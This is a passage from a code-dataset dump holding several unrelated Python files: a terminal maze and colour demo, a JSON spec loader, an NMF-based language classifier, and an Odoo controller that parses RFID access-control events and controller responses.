Two minutes to self destruction.')\n\tprint()\n\tconsole.colourPrint('Evacuate GREEN premises WHITE immediately!')\n\t\n\t#print(('#'*20+'\\n')*20)\n\t#x = console.cursor(6,5)\n\t#print('█')\n\t#x = console.cursor(6,6)\n\t#print('█')\n\n\tprint()\n\n\tmaze = [\n\t\t'███████████████████████████████',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ █ █ █',\n\t\t'█ █ █ █',\n\t\t'█ █ █ █',\n\t\t'█ █ █',\n\t\t'█ █████████ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ ████████ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'█ █ █',\n\t\t'███████████████████████████████'\n\t]\n\n\tblocks = {\n\t '█': Colours.GREY,\n\t ' ': Colours.GREEN\n\t}\n\n\tfor line in maze:\n\t\tfor tile in line:\n\t\t\tcolour = blocks[tile]\n\t\t\tconsole.putColoured(tile, fg=colour, bg=colour)\n\t\tprint()\n\n\tprint()\n\n\tconsole.colour(bg=Colours.GREEN, fg=Colours.WHITE)\n\n\tdef left(steps):\n\t\treturn [(-1, 0) for X in range(steps)]\n\n\tdef right(steps):\n\t\treturn [(1, 0) for X in range(steps)]\n\n\tdef up(steps):\n\t\treturn [(0, -1) for X in range(steps)]\n\n\tdef down(steps):\n\t\treturn [(0, 1) for X in range(steps)]\n\n\tconsole.cursor(3, 5)\n\n\n\t#==============================================================================================================\n\t# Negotiating the maze\n\t#==============================================================================================================\n\t# NOTE: Printing affects cursor position\n\t# TODO: Console should take that into account\n\tfor X, Y in down(6) + right(8) + up(7) + right(6) + down(4) + right(8) + down(6) + left(6) + down(3) + left(8):\n\t\tbreak\n\t\tconsole.cursor(X+console.pos[0], Y+console.pos[1])\n\t\tprint('O')\n\t\tsleep(1/24)\n\t\tconsole.cursor(console.pos[0], console.pos[1])\n\t\tprint(' ')\n\n\n\t#==============================================================================================================\n\t# Rotating bar\n\t#==============================================================================================================\n\tfor f in range(10):\n\t\tbreak\n\t\tconsole.cursor(5,5)\n\t\tprint('|/-\\\\|/-\\\\'[f%8])\n\t\tconsole.cursor(7,12)\n\t\tprint('|/-\\\\|/-\\\\'[f%8])\n\t\tconsole.cursor(6,14)\n\t\tprint('|/-\\\\|/-\\\\'[f%8])\n\t\tsleep(1/8)\n\n\n\t#==============================================================================================================\n\t# Animating coloured squares\n\t#==============================================================================================================\n\tfor f, p, c in zip(range(100), cycle([(5,5), (6,5), (6,6), (5,6)]), cycle([Colours.YELLOW, Colours.PURPLE, Colours.GOLD, Colours.BLOOD])):\n\t\tbreak\n\t\tconsole.cursor(*p)\n\t\tconsole.putColoured(' ', bg=c)\n\t\t\n\t\tconsole.cursor(34, 2)\n\t\tconsole.putColoured('Frame: %d' % f, bg=Colours.BLACK)\n\t\tconsole.cursor(34, 4)\n\t\tconsole.putColoured('X: ', bg=Colours.BLACK, fg=Colours.BLOOD)\n\t\tconsole.putColoured(p[0], bg=Colours.BLACK, fg=Colours.WHITE)\n\t\tconsole.putColoured(', Y: ', bg=Colours.BLACK, fg=Colours.OCEAN)\n\t\tconsole.putColoured(p[1], bg=Colours.BLACK, fg=Colours.WHITE)\n\n\t\tsleep(1/5)\n\n\t\tconsole.cursor(*p)\n\t\tconsole.putColoured(' ', bg=Colours.GREEN)\n\n\tconsole.cursor(0,20)\n\n\n\t#==============================================================================================================\n\t# Markup test\n\t#==============================================================================================================\n\tconsole.printMarkup('Hello there! 
This is white text. IMPORTANT!')\n\n\n\t#==============================================================================================================\n\t# EVENTS\n\t#==============================================================================================================\n\tapp = tk.Tk()\n\tapp.bind('<Left>', \tlambda e: [console.moveCursor(-1, 0), console.putColoured(' ', bg=Colours.GRASS)])\n\tapp.bind('<Right>', lambda e: [console.moveCursor(1, 0), console.putColoured(' ', bg=Colours.GRASS)])\n\tapp.bind('<Up>', \tlambda e: [console.moveCursor(0, -1), console.putColoured(' ', bg=Colours.GRASS)])\n\tapp.bind('<Down>', \tlambda e: [console.moveCursor(0, 1), console.putColoured(' ', bg=Colours.GRASS)])\n\tapp.bind('', lambda e: console.putColoured(' ', bg=choice([Colours.RED, Colours.GOLD, Colours.LAGOON])))\n\tapp.mainloop()\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Console.py","file_name":"Console.py","file_ext":"py","file_size_in_byte":12500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512362606","text":"import os\nimport json\n\nDATASET_PATH = './2013_camera_specs'\n\n\ndef load_json(index):\n source, specification_num = index.split(\"//\")\n specification = specification_num + \".json\"\n with open(os.path.join(DATASET_PATH, source, specification)) as specification_file:\n return json.load(specification_file)\n\n\ndef load_page_title(index):\n return load_json(index).get('')\n\n\ndef load_model(index):\n model = load_json(index).get('model')\n if model:\n if isinstance(model, list):\n concat_model = model[0]\n for i in range(1, len(model)):\n concat_model = concat_model + ' ' + model[i]\n return concat_model\n else:\n return model\n else:\n return 'NO-MODEL'\n\n\n","sub_path":"Rule_Based_Nan/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"41005345","text":"import pandas as pd\nimport numpy as np\nimport sys, os\nimport string\nimport re\nimport unicodedata\nimport itertools\nimport random\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation\nfrom sklearn.metrics import accuracy_score\n\neng_sw = np.load('Data/eng_sw.npy')\nfr_sw = np.load('Data/fr_sw.npy')\ndu_sw = np.load('Data/du_sw.npy')\n\nsw_dict = {'EN' : eng_sw, \n\t\t 'FR' : fr_sw, \n\t\t 'DU' : du_sw}\n\ndef remove_accents(input_str):\n nfkd_form = unicodedata.normalize('NFKD', input_str)\n return u\"\".join([c for c in nfkd_form if not unicodedata.combining(c)])\n\ndef preprocess(text, lang=None):\n text = remove_accents(text)\n text = ''.join(i for i in text if not i.isdigit())\n text = ''.join(i for i in text if (i.isalnum() | (i == ' ')))\n text = text.strip()\n words = re.split(r'\W+', text)\n words = [word.lower() for word in words if word not in string.punctuation]\n words = [word for word in words if len(word) < 15]\n if(lang != None):\n \twords = [word for word in words if word not in sw_dict[lang]]\n return text\n\ndef get_classes(model, feature_names, n_top_words):\n classes = []\n for feature_idx, topic in enumerate(model.components_):\n fnames = [feature_names[i] for i in topic.argsort()[:-n_top_words - 1:-1]]\n if('van' in fnames):\n classes.append('DU')\n elif('the' in fnames):\n classes.append('EN')\n else:\n classes.append('FR')\n return classes\n\ndef print_top_words(model, feature_names, n_top_words):\n for topic_idx, topic 
in enumerate(model.components_):\n message = \"Topic #%d: \" % topic_idx\n message += \" \".join([feature_names[i]\n for i in topic.argsort()[:-n_top_words - 1:-1]])\n print(message)\n print()\n\ndu = open('Data/Corpus/trainDU.txt', 'r').read().split('.')\nall_du = []\nfor sent in du:\n all_du.append(preprocess(sent, lang='DU'))\nall_du = all_du[1:]\nall_du = [du for du in all_du if du != '']\n\nen = open('Data/Corpus/trainEN.txt', 'r').read().split('.')\nall_en = []\nfor sent in en:\n all_en.append(preprocess(sent, lang='EN'))\nall_en = [en for en in all_en if en != '']\n\nfr = open('Data/Corpus/trainFR.txt', 'r').read().split('.')\nall_fr = []\nfor sent in fr:\n all_fr.append(preprocess(sent, lang='FR'))\nall_fr = [fr for fr in all_fr if fr != '']\n\ntf = TfidfVectorizer()\nsparsem = tf.fit_transform(all_en+all_du+all_fr)\nnmf = NMF(n_components=3, random_state=1,\n alpha=.1, l1_ratio=.5).fit(sparsem)\n\nprint()\nprint()\ntf_features_names = tf.get_feature_names()\nprint_top_words(nmf, tf_features_names, 10)\nprint()\nprint()\n\ntest = open('Data/Test/all.txt', 'r').read().split('\\n')\nclasses = get_classes(nmf, tf.get_feature_names(), 10)\nclasses = input('Classes: ').split(',')\npreds = []\nlabels = np.load('Stats/labels.npy')\nstats = []\n\nfor sentence, label in zip(test, labels):\n try:\n sentence = preprocess(sentence)\n sparset = tf.transform([sentence]).todense()\n results = nmf.transform(sparset)[0]\n idx = results.argmax()\n preds.append(classes[idx])\n for i in range(3):\n stats.append([classes[idx], results[i], classes[i], sentence, label])\n except Exception as e:\n print(e)\n\ndf = pd.DataFrame(stats, columns = ['Prediction', 'Score', 'Language', 'Sentence', 'Label'])\ndf.to_pickle('Stats/nmf_stats.pkl')\n\nprint(accuracy_score(labels, preds))\n\n\n\n","sub_path":"Demo/nmf.py","file_name":"nmf.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182349881","text":"# -*- coding: utf-8 -*-\nfrom odoo import http, fields, exceptions, _\nfrom odoo.http import request\nfrom enum import Enum\n\nimport datetime\nimport json\nimport traceback\nimport psycopg2\nimport logging\nimport time\n\n_logger = logging.getLogger(__name__)\n\n\nclass BadTimeException(Exception):\n pass\n\n\nclass F0Parse(Enum):\n hw_ver = 0\n serial_num = 1\n sw_ver = 2\n inputs = 3\n outputs = 4\n time_schedules = 5\n io_table_lines = 6\n alarm_lines = 7\n mode = 8\n max_cards_count = 9\n max_events_count = 10\n\n\nclass WebRfidController(http.Controller):\n def __init__(self, *args, **kwargs):\n self._post = None\n self._vending_hw_version = None\n self._webstacks_env = None\n self._webstack = None\n self._ws_db_update_dict = None\n self._time_format = '%m.%d.%y %H:%M:%S'\n super(WebRfidController, self).__init__(*args, **kwargs)\n\n def _log_cmd_error(self, description, command, error, status_code):\n command.write({\n 'status': 'Failure',\n 'error': error,\n 'ex_timestamp': fields.datetime.now(),\n 'response': json.dumps(self._post),\n })\n\n self._report_sys_ev(description, command.controller_id)\n return self._check_for_unsent_cmd(status_code)\n\n def _check_for_unsent_cmd(self, status_code, event=None):\n commands_env = request.env['hr.rfid.command'].sudo()\n\n processing_comm = commands_env.search([\n ('webstack_id', '=', self._webstack.id),\n ('status', '=', 'Process'),\n ])\n\n if len(processing_comm) > 0:\n processing_comm = processing_comm[-1]\n return self._retry_command(status_code, processing_comm, 
event)\n\n command = commands_env.search([\n ('webstack_id', '=', self._webstack.id),\n ('status', '=', 'Wait'),\n ])\n\n if len(command) == 0:\n return { 'status': status_code }\n\n command = command[-1]\n\n if event is not None:\n event.command_id = command\n return self._send_command(command, status_code)\n\n def _retry_command(self, status_code, cmd, event):\n if cmd.retries == 5:\n cmd.status = 'Failure'\n return self._check_for_unsent_cmd(status_code, event)\n\n cmd.retries = cmd.retries + 1\n\n if event is not None:\n event.command_id = cmd\n return self._send_command(cmd, status_code)\n\n def _parse_heartbeat(self):\n self._ws_db_update_dict['version'] = str(self._post['FW'])\n return self._check_for_unsent_cmd(200)\n\n def _parse_event(self):\n controller = request.env['hr.rfid.ctrl'].sudo().search([\n ('ctrl_id', '=', self._post['event']['id']),\n ('webstack_id', '=', self._webstack.id),\n ])\n\n if len(controller) == 0:\n ctrl_env = request.env['hr.rfid.ctrl'].with_user(1)\n cmd_env = request.env['hr.rfid.command'].with_user(1)\n\n # try:\n controller = ctrl_env.create({\n 'name': 'Controller',\n 'ctrl_id': self._post['event']['id'],\n 'webstack_id': self._webstack.id,\n })\n # except\n\n command = cmd_env.read_controller_information_cmd(controller)\n\n return self._send_command(command, 400)\n\n card_env = request.env['hr.rfid.card'].sudo()\n workcodes_env = request.env['hr.rfid.workcode'].sudo()\n card = card_env.search(['|',('active', '=', True), ('active', '=', False),\n ('number', '=', self._post['event']['card']) ])\n reader = None\n event_action = self._post['event']['event_n']\n\n if event_action == 30:\n cmd_env = request.env['hr.rfid.command'].sudo()\n self._report_sys_ev('Controller restarted', controller)\n cmd_env.synchronize_clock_cmd(controller)\n return self._check_for_unsent_cmd(200)\n\n reader_num = self._post['event']['reader']\n if reader_num == 0:\n reader_num = ((self._post['event']['event_n'] - 3) % 4) + 1\n else:\n reader_num = reader_num & 0x07\n for it in controller.reader_ids:\n if it.number == reader_num:\n reader = it\n break\n\n if reader is None:\n self._report_sys_ev('Could not find a reader with that id', controller)\n return self._check_for_unsent_cmd(200)\n\n door = reader.door_id\n\n ev_env = request.env['hr.rfid.event.user'].sudo()\n\n if len(card) == 0:\n if event_action == 64 and controller.hw_version != self._vending_hw_version:\n cmd_env = request.env['hr.rfid.command'].sudo()\n cmd = {\n 'webstack_id': controller.webstack_id.id,\n 'controller_id': controller.id,\n 'cmd': 'DB',\n 'status': 'Process',\n 'ex_timestamp': fields.Datetime.now(),\n 'cmd_data': '40%02X00' % (4 + 4*(reader.number - 1)),\n }\n cmd = cmd_env.create(cmd)\n cmd_js = {\n 'status': 200,\n 'cmd': {\n 'id': cmd.controller_id.ctrl_id,\n 'c': cmd.cmd[:2],\n 'd': cmd.cmd_data,\n }\n }\n cmd.request = json.dumps(cmd_js)\n if self._post['event']['card'] == '0000000000':\n self._report_sys_ev('', controller)\n else:\n self._report_sys_ev(_('Could not find the card'), controller)\n return cmd_js\n elif event_action in [ 21, 22, 23, 24 ]:\n event_dict = {\n 'ctrl_addr': controller.ctrl_id,\n 'door_id': reader.door_id.id,\n 'reader_id': reader.id,\n 'event_time': self._get_ws_time_str(),\n 'event_action': '5', # Exit button\n }\n event = ev_env.create(event_dict)\n return self._check_for_unsent_cmd(200, event)\n\n if self._post['event']['card'] == '0000000000':\n self._report_sys_ev('', controller)\n else:\n self._report_sys_ev(_('Could not find the card'), controller)\n return 
self._check_for_unsent_cmd(200)\n\n # External db event, controller requests for permission to open or close door\n if event_action == 64 and controller.hw_version != self._vending_hw_version:\n ret = request.env['hr.rfid.access.group.door.rel'].sudo().search([\n ('access_group_id', 'in', card.get_owner().hr_rfid_access_group_ids.ids),\n ('door_id', '=', reader.door_id.id)\n ])\n return self._respond_to_ev_64(len(ret) > 0 and card.active is True,\n controller, reader, card)\n\n event_action = ((event_action - 3) % 4) + 1\n # Turnstile controller. If the 7th bit is not up, then there was no actual entry\n if controller.hw_version == '9' \\\n and (self._post['event']['reader'] & 64) == 0 \\\n and event_action == '1':\n event_action = '6'\n\n # Relay controller\n if controller.is_relay_ctrl() and event_action == 1 and controller.mode == 3:\n dt = self._post['event']['dt']\n if len(dt) == 24:\n chunks = [ dt[0:6], dt[6:12], dt[12:18], dt[18:24] ]\n print('Chunks=' + str(chunks))\n door_number = 0\n for i in range(len(chunks)):\n chunk = chunks[i]\n n1 = int(chunk[:2])\n n2 = int(chunk[2:4])\n n3 = int(chunk[4:])\n door_number |= n1*100 + n2*10 + n3\n if i != len(chunks)-1:\n door_number <<= 8\n for _door in reader.door_ids:\n if _door.number == door_number:\n door = _door\n break\n\n event_dict = {\n 'ctrl_addr': controller.ctrl_id,\n 'door_id': door.id,\n 'reader_id': reader.id,\n 'card_id': card.id,\n 'event_time': self._get_ws_time_str(),\n 'event_action': str(event_action),\n }\n\n if reader.mode == '03' and controller.hw_version != self._vending_hw_version: # Card and workcode\n wc = workcodes_env.search([\n ('workcode', '=', self._post['event']['dt'])\n ])\n if len(wc) == 0:\n event_dict['workcode'] = self._post['event']['dt']\n else:\n event_dict['workcode_id'] = wc.id\n\n self._get_card_owner(event_dict, card)\n event = ev_env.create(event_dict)\n\n return self._check_for_unsent_cmd(200, event)\n\n def _parse_response(self):\n command_env = request.env['hr.rfid.command'].with_user(1)\n response = self._post['response']\n controller = None\n\n for ctrl in self._webstack.controllers:\n if ctrl.ctrl_id == response['id']:\n controller = ctrl\n break\n\n if controller is None:\n self._report_sys_ev('Module sent us a response from a controller that does not exist')\n return self._check_for_unsent_cmd(200)\n\n command = command_env.search([ ('webstack_id', '=', self._webstack.id),\n ('controller_id', '=', controller.id),\n ('status', '=', 'Process'),\n ('cmd', '=', response['c']), ], limit=1)\n\n if len(command) == 0 and response['c'] == 'DB':\n command = command_env.search([ ('webstack_id', '=', self._webstack.id),\n ('controller_id', '=', controller.id),\n ('status', '=', 'Process'),\n ('cmd', '=', 'DB2'), ], limit=1)\n\n if len(command) == 0:\n self._report_sys_ev('Controller sent us a response to a command we never sent')\n return self._check_for_unsent_cmd(200)\n\n if response['e'] != 0:\n command.write({\n 'status': 'Failure',\n 'error': str(response['e']),\n 'ex_timestamp': fields.datetime.now(),\n 'response': json.dumps(self._post),\n })\n return self._check_for_unsent_cmd(200)\n\n if response['c'] == 'F0':\n self._parse_f0_response(command, controller)\n\n if response['c'] == 'F6':\n data = response['d']\n readers = [None, None, None, None]\n for it in controller.reader_ids:\n readers[it.number-1] = it\n for i in range(4):\n if readers[i] is not None:\n mode = str(data[i*6:i*6+2])\n readers[i].write({\n 'mode': mode,\n 'no_d6_cmd': True,\n })\n\n if response['c'] == 'F9':\n 
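# Sketch of the relay-controller door-number decoding in _parse_event above:
# the 24-character 'dt' field is four 6-character chunks, each spelling one
# byte as three two-digit decimal fields (n1*100 + n2*10 + n3), and the four
# bytes are packed big-endian into a 32-bit door mask.
def decode_door_number(dt: str) -> int:
    assert len(dt) == 24
    door_number = 0
    for i in range(0, 24, 6):
        chunk = dt[i:i + 6]
        byte = int(chunk[0:2]) * 100 + int(chunk[2:4]) * 10 + int(chunk[4:6])
        door_number = (door_number << 8) | byte
    return door_number

# e.g. decode_door_number('000000' * 3 + '000001') == 1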
controller.write({\n 'io_table': response['d']\n })\n\n if response['c'] == 'FC':\n apb_mode = response['d']\n for door in controller.door_ids:\n door.apb_mode = (door.number == '1' and (apb_mode & 1)) \\\n or (door.number == '2' and (apb_mode & 2))\n\n if response['c'] == 'B3':\n data = response['d']\n\n entrance = [ int(data[0:2], 16), int(data[2:4], 16) ]\n exit = [ int(data[4:6], 16), int(data[6:8], 16) ]\n usys = [ int(data[8:10], 16), int(data[10:12], 16) ]\n uin = [ int(data[12:14], 16), int(data[14:16], 16) ]\n temperature = int(data[16:20], 10)\n humidity = int(data[20:24], 10)\n Z1 = int(data[24:26], 16)\n Z2 = int(data[26:28], 16)\n Z3 = int(data[28:30], 16)\n Z4 = int(data[30:32], 16)\n\n TOS = int(data[32:34], 16) * 10000 \\\n + int(data[34:36], 16) * 1000 \\\n + int(data[36:38], 16) * 100 \\\n + int(data[38:40], 16) * 10 \\\n + int(data[40:42], 16)\n\n DT = [ int(data[42:44], 16), int(data[44:46], 16), int(data[46:48], 16) ]\n\n if temperature >= 1000:\n temperature -= 1000\n temperature *= -1\n temperature /= 10\n\n humidity /= 10\n\n sys_voltage = ((usys[0] & 0xF0) >> 4) * 1000\n sys_voltage += (usys[0] & 0x0F) * 100\n sys_voltage += ((usys[1] & 0xF0) >> 4) * 10\n sys_voltage += (usys[1] & 0x0F)\n sys_voltage = (sys_voltage * 8) / 500\n\n input_voltage = ((uin[0] & 0xF0) >> 4) * 1000\n input_voltage += (uin[0] & 0x0F) * 100\n input_voltage += ((uin[1] & 0xF0) >> 4) * 10\n input_voltage += (uin[1] & 0x0F)\n input_voltage = (input_voltage * 8) / 500\n\n controller.write({\n 'temperature': temperature,\n 'humidity': humidity,\n 'system_voltage': sys_voltage,\n 'input_voltage': input_voltage,\n })\n\n command.write({\n 'status': 'Success',\n 'ex_timestamp': fields.datetime.now(),\n 'response': json.dumps(self._post),\n })\n\n return self._check_for_unsent_cmd(200)\n\n def _parse_f0_cmd(self, data):\n def bytes_to_num(start, digits):\n digits = digits-1\n res = 0\n for j in range(digits+1):\n multiplier = 10 ** (digits-j)\n res = res + int(data[start:start+2], 16) * multiplier\n start = start + 2\n return res\n\n return {\n F0Parse.hw_ver: str(bytes_to_num(0, 2)),\n F0Parse.serial_num: str(bytes_to_num(4, 4)),\n F0Parse.sw_ver: str(bytes_to_num(12, 3)),\n F0Parse.inputs: bytes_to_num(18, 3),\n F0Parse.outputs: bytes_to_num(24, 3),\n F0Parse.time_schedules: bytes_to_num(32, 2),\n F0Parse.io_table_lines: bytes_to_num(36, 2),\n F0Parse.alarm_lines: bytes_to_num(40, 1),\n F0Parse.mode: int(data[42:44], 16),\n F0Parse.max_cards_count: bytes_to_num(44, 5),\n F0Parse.max_events_count: bytes_to_num(54, 5),\n }\n\n def _parse_f0_response(self, command, controller):\n ctrl_env = request.env['hr.rfid.ctrl'].with_user(1)\n response = self._post['response']\n data = response['d']\n ctrl_mode = int(data[42:44], 16)\n external_db = (ctrl_mode & 0x20) > 0\n relay_time_factor = '1' if ctrl_mode & 0x40 else '0'\n dual_person_mode = (ctrl_mode & 0x08) > 0\n ctrl_mode = ctrl_mode & 0x07\n\n f0_parse = self._parse_f0_cmd(data)\n\n hw_ver = f0_parse[F0Parse.hw_ver]\n\n if (ctrl_mode < 1 or ctrl_mode > 4):\n return self._log_cmd_error('F0 command failure, controller sent '\n 'us a wrong mode', command, '31', 200)\n\n readers_count = int(data[30:32], 16)\n\n mode_reader_relation = { 1: [1, 2], 2: [2, 4], 3: [4], 4: [4] }\n\n if not ctrl_env.hw_version_is_for_relay_ctrl(hw_ver) and \\\n readers_count not in mode_reader_relation[ctrl_mode]:\n return self._log_cmd_error('F0 sent us a wrong reader-controller '\n 'mode combination', command, '31', 200)\n\n reader_env = 
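# Standalone sketch of the hex-string decoding used by _parse_f0_cmd's
# bytes_to_num and the B3 branch above: each byte arrives as two hex
# characters whose value is a single decimal digit, so a run of bytes spells
# a base-10 number, and the supply voltages are BCD nibbles scaled by 8/500.
def bytes_to_num(data: str, start: int, digits: int) -> int:
    res = 0
    for _ in range(digits):
        res = res * 10 + int(data[start:start + 2], 16)
        start += 2
    return res

assert bytes_to_num('010203', 0, 3) == 123

def bcd_voltage(hi: int, lo: int) -> float:
    raw = (((hi & 0xF0) >> 4) * 1000 + (hi & 0x0F) * 100
           + ((lo & 0xF0) >> 4) * 10 + (lo & 0x0F))
    return raw * 8 / 500  # scaling factor used in the B3 handler above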
request.env['hr.rfid.reader'].with_user(1)\n door_env = request.env['hr.rfid.door'].with_user(1)\n\n sw_ver = f0_parse[F0Parse.sw_ver]\n inputs = f0_parse[F0Parse.inputs]\n outputs = f0_parse[F0Parse.outputs]\n time_schedules = f0_parse[F0Parse.time_schedules]\n io_table_lines = f0_parse[F0Parse.io_table_lines]\n alarm_lines = f0_parse[F0Parse.alarm_lines]\n max_cards_count = f0_parse[F0Parse.max_cards_count]\n max_events_count = f0_parse[F0Parse.max_events_count]\n serial_num = f0_parse[F0Parse.serial_num]\n\n old_ctrl = ctrl_env.search([\n ('serial_number', '=', serial_num)\n ], limit=1)\n\n ctrl_already_existed = False\n if len(old_ctrl) > 0:\n if old_ctrl.webstack_id == controller.webstack_id:\n ctrl_already_existed = True\n else:\n old_ctrl.webstack_id = controller.webstack_id\n\n old_reader_count = len(controller.reader_ids)\n old_door_count = len(controller.door_ids)\n new_reader_count = 0\n new_door_count = 0\n\n def create_door(name, number):\n # If the controller is a vending controller\n nonlocal old_door_count\n nonlocal new_door_count\n\n door_dict = {\n 'name': name,\n 'number': number,\n 'controller_id': controller.id,\n }\n\n if new_door_count < old_door_count:\n new_door_count += 1\n _door = controller.door_ids[new_door_count-1]\n door_dict.pop('name')\n _door.write(door_dict)\n return _door\n\n if hw_ver == self._vending_hw_version:\n return None\n return door_env.create(door_dict)\n\n def create_reader(name, number, reader_type, door_id=None):\n create_dict = {\n 'name': name,\n 'number': number,\n 'reader_type': reader_type,\n 'controller_id': controller.id,\n }\n\n nonlocal old_reader_count\n nonlocal new_reader_count\n\n if door_id is not None:\n create_dict['door_id'] = door_id\n\n if new_reader_count < old_reader_count:\n new_reader_count += 1\n _reader = controller.reader_ids[new_reader_count-1]\n create_dict.pop('name')\n _reader.write(create_dict)\n return _reader\n\n return reader_env.create(create_dict)\n\n def add_door_to_reader(_reader, _door):\n _reader.door_ids += _door\n\n def gen_d_name(door_num, controller_id):\n return 'Door ' + str(door_num) + ' of ctrl ' + str(controller_id)\n\n if controller.hw_version_is_for_relay_ctrl(hw_ver):\n if ctrl_mode == 1 or ctrl_mode == 3:\n reader = create_reader('R1', 1, '0')\n for i in range(outputs):\n door = create_door(gen_d_name(i+1, controller.id), i+1)\n add_door_to_reader(reader, door)\n for i in range(1, readers_count):\n create_reader('R' + str(i+1), i+1, '0')\n elif ctrl_mode == 2:\n if outputs > 16 and readers_count < 2:\n return self._log_cmd_error('F0 sent us too many outputs and not enough readers',\n command, '31', 200)\n reader = create_reader('R1', 1, '0')\n for i in range(outputs):\n door = create_door(gen_d_name(i+1, controller.id), i+1)\n add_door_to_reader(reader, door)\n if outputs > 16:\n reader = create_reader('R2', 2, '0')\n for i in range(outputs-16):\n door = create_door(gen_d_name(i+1, controller.id), i+1)\n add_door_to_reader(reader, door)\n for i in range(2, readers_count):\n create_reader('R' + str(i+1), i+1, '0')\n else:\n for i in range(1, readers_count):\n create_reader('R' + str(i+1), i+1, '0')\n else:\n raise exceptions.ValidationError(_('Got controller mode=%d for hw_ver=%s???')\n % (ctrl_mode, hw_ver))\n else:\n if ctrl_mode == 1 or ctrl_mode == 3:\n last_door = create_door(gen_d_name(1, controller.id), 1)\n last_door = last_door.id\n create_reader('R1', 1, '0', last_door)\n if readers_count > 1:\n create_reader('R2', 2, '1', last_door)\n elif ctrl_mode == 2 and readers_count == 
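# Sketch of the reuse-or-create pattern followed by create_door /
# create_reader in _parse_f0_response above: existing records are rewritten
# in place (keeping their user-given names) and new ones are created only
# once the old ones run out; simplified here with plain dicts.
def sync_records(old, wanted):
    """old: existing record dicts; wanted: list of (name, number) specs."""
    result = []
    for i, (name, number) in enumerate(wanted):
        if i < len(old):
            old[i]['number'] = number      # keep the existing 'name'
            result.append(old[i])
        else:
            result.append({'name': name, 'number': number})
    return result

# leftovers old[len(wanted):] would then be unlinked, as in the F0 handler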
4:\n last_door = create_door(gen_d_name(1, controller.id), 1)\n last_door = last_door.id\n create_reader('R1', 1, '0', last_door)\n create_reader('R2', 2, '1', last_door)\n last_door = create_door(gen_d_name(2, controller.id), 2)\n last_door = last_door.id\n create_reader('R3', 3, '0', last_door)\n create_reader('R4', 4, '1', last_door)\n else: # (ctrl_mode == 2 and readers_count == 2) or ctrl_mode == 4\n print('harware version', hw_ver)\n last_door = create_door(gen_d_name(1, controller.id), 1)\n if last_door: \n last_door = last_door.id \n else:\n last_door = None\n create_reader('R1', 1, '0', last_door)\n last_door = create_door(gen_d_name(2, controller.id), 2)\n if last_door: \n \t last_door = last_door.id \n else:\n last_door = None\n create_reader('R2', 2, '0', last_door)\n\n if ctrl_mode == 3:\n last_door = create_door(gen_d_name(2, controller.id), 2)\n last_door = last_door.id\n create_reader('R3', 3, '0', last_door)\n last_door = create_door(gen_d_name(3, controller.id), 3)\n last_door = last_door.id\n create_reader('R4', 4, '0', last_door)\n elif ctrl_mode == 4:\n last_door = create_door(gen_d_name(3, controller.id), 3)\n last_door = last_door.id\n create_reader('R3', 3, '0', last_door)\n last_door = create_door(gen_d_name(4, controller.id), 4)\n last_door = last_door.id\n create_reader('R4', 4, '0', last_door)\n\n if old_reader_count > new_reader_count:\n controller.reader_ids[new_reader_count : old_reader_count].unlink()\n if old_door_count > new_door_count:\n controller.door_ids[new_door_count : old_door_count].unlink()\n\n if controller.serial_number is False:\n controller.name = 'Controller ' + serial_num + ' ' + str(controller.ctrl_id)\n\n controller.write({\n 'hw_version': hw_ver,\n 'serial_number': serial_num,\n 'sw_version': sw_ver,\n 'inputs': inputs,\n 'outputs': outputs,\n 'readers': readers_count,\n 'time_schedules': time_schedules,\n 'io_table_lines': io_table_lines,\n 'alarm_lines': alarm_lines,\n 'mode': ctrl_mode,\n 'external_db': external_db,\n 'relay_time_factor': relay_time_factor,\n 'dual_person_mode': dual_person_mode,\n 'max_cards_count': max_cards_count,\n 'max_events_count': max_events_count,\n 'last_f0_read': fields.datetime.now(),\n })\n\n cmd_env = request.env['hr.rfid.command'].sudo()\n if not ctrl_already_existed:\n cmd_env.synchronize_clock_cmd(controller)\n cmd_env.delete_all_cards_cmd(controller)\n cmd_env.delete_all_events_cmd(controller)\n cmd_env.read_readers_mode_cmd(controller)\n cmd_env.read_io_table_cmd(controller)\n\n if not controller.is_relay_ctrl() and (ctrl_mode == 1 or ctrl_mode == 3):\n cmd_env.read_anti_pass_back_mode_cmd(controller)\n\n def _report_sys_ev(self, description, controller=None):\n sys_ev_env = request.env['hr.rfid.event.system'].sudo()\n\n sys_ev = {\n 'webstack_id': self._webstack.id,\n 'error_description': description,\n 'input_js': json.dumps(self._post),\n }\n\n if 'event' in self._post:\n try:\n sys_ev['timestamp'] = self._get_ws_time_str()\n except BadTimeException:\n sys_ev['timestamp'] = str(fields.datetime.now())\n sys_ev['event_action'] = str(self._post['event']['event_n'])\n else:\n sys_ev['timestamp'] = datetime.datetime.now()\n\n if controller is not None:\n sys_ev['controller_id'] = controller.id\n\n sys_ev_env.create(sys_ev)\n\n def _respond_to_ev_64(self, open_door, controller, reader, card):\n cmd_env = request.env['hr.rfid.command'].sudo()\n ev_env = request.env['hr.rfid.event.user'].sudo()\n open_door = 3 if open_door is True else 4\n cmd = {\n 'webstack_id': controller.webstack_id.id,\n 
